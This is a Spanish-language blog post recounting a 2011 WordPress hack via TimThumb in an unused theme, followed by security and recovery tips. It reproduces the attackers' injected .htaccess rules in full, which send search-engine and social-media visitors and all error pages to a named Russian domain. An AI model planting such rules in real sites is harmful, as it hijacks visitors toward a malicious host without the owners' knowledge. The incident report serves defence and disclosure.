¿Que hacer para evitar o solucionar un WordPress hackeado?

wordpress-hacked

El pasado viernes 9 de diciembre parte de la seguridad del hosting fue vulnerable por varias horas, ya había pasado este tipo de intentos de ataque antes por supuesto, pero siempre sin éxito, me refiero a los intentos de hackear Hackeame, lamentablemente el viernes pasado, alguien usó un exploit en un theme perteneciente al theme HeadLines de la empresa WooThemes, el script en si que les dejo explotar el sitio fue el: TimThumb.

Lamentablemente tenía aquel theme, claro que sin uso ya que uso otro para este sitio, de igual forma se vio comprometido mi hosting entero, y por lo tanto todos mis otros sitios, como Hackeame.org, Hackeame.net, foro.hackeame.org así como otros.

Al parecer el exploit les permitía luego tener acceso total a hosting, por lo que si ellos hubieran querido hubieran defaced a todo el sitio y los subsitios que albergan en el. ¿Como se que tuvieron acceso a todo el hosting?, fue porque pudieron modificar varios archivos del sitio, ya que todos llevaban como detalle: modificación 5/12/2011 y 9/12/2011, y bueno la pagina principal: index.php también fue modificada y codificada, para que se re direccionara a un sitio ruso, mismo que no mencionare porque es peligroso en si.

Otra parte comprometida fue el archivo .htaccess que fue cambiado en cada dominio, el código que fue agregado fue:

 RewriteEngine On
 RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube
|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto
|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing
|dogpile|facebook|twitter|blog|live|myspace|mail|yandex
|rambler|ya|aport|linkedin|flickr|nigma|liveinternet
|vkontakte|webalta|filesearch|yell|openstat|metabot
|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy
|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek
|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka
|searchspot|slider|topseven|allthesites|libero|clickey
|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet
|freenet|fireball|flemiro|suchbot|acoon
|cyber-content|devaro|fastbot|netzindex|abacho|allesklar
|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene
|suchmaschine|web-archiv|web|websuche|witch|wolong|oekoportal
|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila
|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista
|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch
|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk
|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy
|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek
|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey
|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac
|findloo|kobala|limier|express|bestireland|browseireland
|finditireland|iesearch|ireland-information|kompass|startsiden
|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol
|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow
|findhow|icq|goo|westaustraliaonline)\.(.*)
 RewriteRule ^(.*)$ http://connection-masters.ru/right/index.php
 [R=301,L]
 ErrorDocument 400 http://connection-masters.ru/right/index.php
 ErrorDocument 401 http://connection-masters.ru/right/index.php
 ErrorDocument 403 http://connection-masters.ru/right/index.php
 ErrorDocument 404 http://connection-masters.ru/right/index.php
 ErrorDocument 500 http://connection-masters.ru/right/index.php

El resultado de lo que agregaron en el archivo .htaccess fue que todas los visitantes que provenían de los buscadores, ejemplo Google, Yahoo, Bing, etc. todos automáticamente eran re direccionados al sitio ruso.

El día 5 de diciembre también hubo incidentes de este caso, pero basto con borrar el archivo y automáticamente WP recreaba uno nuevo, pero lo que paso el 9 de diciembre fue que cada vez que borrábamos el archivo el mismo archivo con el código malicioso volvía a crearse, y claro esto sucedió porque se modificaron archivos del core de WP.

Script kiddie¿WordPress es seguro? esto me dice que no, no lo es en lo absoluto, bien podemos culpar al theme, o incluso al archivo thumb.php, pero acaso no es más culpable aquel que le dio permiso a un theme que ni siquiera esta en uso, hablo de WP, permisos que bien explotados pueden dar acceso total a cualquier Script kiddie sobre un hosting entero. Por supuesto que este archivo ahora puede estar corregido para evitar estos problemas, pero en lo personal WP no menciono que hubiera actualizaciones para este theme, ¿como habría de saberlo?.

Conclusiones: WordPress no es seguro, me dirán que ningún CMS lo es, y estoy de acuerdo, pero les dejo unos consejos de seguridad que debieron haber evitado este catástrofe si yo los hubiera hecho:

  • Si tus visitas bajan hay un buen porcentaje que se deba a que has sido hackeado y tus visitas se re direccionan a otro sitio. Por lo que revisa que tu archivo .htaccess este siempre limpio.
  • Siempre haz una copia de tu base de datos al menos cada semana, si tienes flojera de hacerlo manualmente hay una gran cantidad de plugins que crearan una copia de tu base de datos automáticamente cada determinado tiempo.
  • Siempre hacer una copia de tus archivos ftp de tu hosting, esto es opcional, ya que si estas en un hosting mínimamente decente ellos lo hacen por ti.
  • Eliminar cualquier plugin o theme que no estés usando, ya que pueden ser una puerta abierta a los Script kiddie.
  • Obviamente tener siempre actualizado tus plugin y tu WordPress, es tedioso muchas veces pero esencial hacerlo.
  • Échale un vistazo siempre a tus archivos y a su fechas de modificación, puede que estés bajo ataque desde hace mucho solo que aún no se han apoderado de todo, y estás aún a tiempo para parar los ataques, así que también mira los archivos error_log de tus sitios para ver que errores de permiso o similares tienes.
  • Fíjate si tienes un plugin o theme que use el archivo thumb.php o TimThumb.php en caso de ser tu respuesta positiva actualízalo ya mismo, bajándote la ultima versión de TimThumb y reemplazándola.

Si estás leyendo esto porque tu sitio fue hackeado, la solución es sencilla, borra todos tus archivos excepto la carpeta donde están tus archivos subidos como imágenes, etc. Luego proseguir a re subir una instalación limpia de wordpress, y claro luego cambias tu contraseña.

Otra forma es llamar al soporte de tu hosting y ellos harán todo esto por ti, sin que tengas que mover un dedo.

(Léido 35 veces, 1 lectores lo leyeron hoy)

Sobre Isaac Zarzuri

Estudiante de Ingeniería en Sistemas.
Amante de los juegos MOBAS, y RTS.

Comentar

Su dirección de correo electrónico no será publicada.Los campos necesarios están marcados *

*

Retype the CAPTCHA code from the image
Change the CAPTCHA code

x

Mira además

Top 4: Los mejores Tablets Chinos de 9.7″ con Pantalla Retina

    Luego de más de un mes sin publicar, les traigo la primera parte ...

Dual Core: Top 10 Las mejores tablets chinas de 8 pulgadas

El pasado mes estuvimos viendo una lista de los mejores tablets chinas de 7 pulgadas, ...